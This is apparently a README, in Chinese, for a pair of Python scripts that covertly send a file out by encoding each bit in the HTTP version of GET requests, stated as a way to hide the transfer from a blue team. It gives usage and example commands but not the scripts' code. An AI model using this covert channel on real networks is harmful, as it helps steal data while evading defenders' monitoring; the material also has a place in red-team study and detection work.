使用HTTP协议版本逐位发送文件(“HTTP/1.0”表示0,“HTTP/1.1”表示1)。它使用GET请求,因此蓝队只会看到发往你IP地址的请求。但发送较大文件需要很长时间,例如发送200 KB需要1小时,并且请求数量会非常高(文件字节数的8倍)。

运行监听器使用listener.py,带一个可选参数:监听端口。
python3 listener.py [PORT]
示例:
python3 listener.py 8080
发送文件使用sender.py,带两个必选参数:文件路径和监听器URL;以及一个可选参数:远程创建的文件名(如果不使用,则使用输入文件的名称)。
python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]
示例:
python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt
首先发送文件:

如果变量debug设置为True(默认情况下),你可以在监听器日志消息中看到二进制值:

新建的文件会包含输入文件的内容:

我想(我不确定)我在Twitter上看到有人说他使用这种方法外传数据,我觉得这个想法不错,如果你是那个人,请告诉我。